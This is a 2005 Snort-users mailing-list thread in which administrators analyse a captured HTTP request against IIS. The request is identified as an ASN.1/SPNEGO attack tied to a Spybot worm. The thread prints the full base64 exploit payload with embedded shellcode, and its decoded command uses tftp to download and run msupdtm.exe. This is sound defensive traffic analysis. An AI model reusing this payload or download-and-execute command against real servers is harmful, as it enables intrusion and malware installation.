[Snort-users] Unrecognized attack patterns against IIS

TPanaitescu at ...2032... TPanaitescu at ...2032...
Sat Jun 11 09:52:18 EDT 2005


That's it, "cmd /c tftp -i 0.0.0.0 GET msupdtm.exe&start msupdtm.exe&exit" 
among other things! Good point ! Thanks

Tudor



stephane nasdrovisky <stephane.nasdrovisky at ...12261...> 
06/11/2005 12:24 PM

To
TPanaitescu at ...2032...
cc
Michael Scheidell <scheidell at ...5171...>
Subject
Re: [Snort-users] Unrecognized attack patterns against IIS






Have you tried to base 64 decode this string ( 
http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx )? 
Don't forget the trailing ==.
It looks like http://www.sarc.com/avcenter/venc/data/w32.spybot.pkc.html
The decoded string contains: cmd /c tftp -i 0.0.0.0 GET msupdtm.exe

The worm filename is different in my network neibourhood: cgy32win.exe, 
ms-upd.exe & win-logon.exe (98k -111k)

TPanaitescu at ...2032... wrote:

> Seen that too, it seems that it is a newer "patch" from MS for IE, or 
> IEs configured for this, trying to negotiate authorization using 
> SPNEGO from the GSS-API.  You can see the packets in full if you use a 
> sniffer in front of that web server, I used ethereal and got the info 
> below.
>
> Could be an attack also trying to get unauthorized access to a server. 
> Anyone with another clue ?

ASN.1 attack.

> GET / HTTP/1.0
> Host: X.X.X.X
> Authorization: Negotiate 
> 
YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ 

>
> 
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF 

>
> 
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ 

>
> 
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF 

>
> 
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ 

>
> 
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB 

>
> 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 

>
> 
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB 

>
> 
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB 

>
> 
QUFBQUFBQQMAI4IMVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAdAfByg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDMcBki0AwhcB4D4tADItwHK 

>
> 
2LaAjpCwAAAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDAuMC4wLjAgR0VUIG1zdXBkdG0uZXhlJnN0YXJ0IG1zdXBkdG0uZXhlJmV4aXQAQkJCQkJCQkJCQkJCQkJCQkJC 

>
> QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk



-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-users/attachments/20050611/4b6e4f1b/attachment.html>


More information about the Snort-users mailing list